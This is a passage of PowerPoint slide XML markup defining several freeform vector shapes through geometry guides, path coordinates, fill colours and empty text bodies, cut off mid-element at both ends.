                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="999999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10365" name="Freeform 446"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="7011988"/>
            <a:ext cx="82550" cy="20637"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 0 h 9"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 9"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 9"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 9"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 9"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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9"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 9 h 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9">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10366" name="Freeform 447"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="6954838"/>
            <a:ext cx="82550" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 11"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 11"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 11"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 11"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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1"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 11 h 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1">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10367" name="Freeform 448"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1490662" y="6931025"/>
            <a:ext cx="138113" cy="252413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 61"/>
              <a:gd name="T1" fmla="*/ 0 h 112"/>
              <a:gd name="T2" fmla="*/ 0 w 61"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T34" fmla="*/ 0 w 61"/>
              <a:gd name="T35" fmla="*/ 0 h 1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1"/>
              <a:gd name="T55" fmla="*/ 0 h 112"/>
              <a:gd name="T56" fmla="*/ 61 w 61"/>
              <a:gd name="T57" fmla="*/ 112 h 1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1" h="112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10368" name="Freeform 449"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1558925" y="6872288"/>
            <a:ext cx="177800" cy="33337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T2" fmla="*/ 0 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 0 h 15"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 0 h 15"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 0 h 15"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T41" fmla="*/ 0 h 15"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T43" fmla="*/ 0 h 15"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T45" fmla="*/ 0 h 15"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 0 h 15"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 0 h 15"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T66" fmla="*/ 0 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T68" fmla="*/ 0 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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9"/>
              <a:gd name="T106" fmla="*/ 0 h 15"/>
              <a:gd name="T107" fmla="*/ 79 w 79"/>
              <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
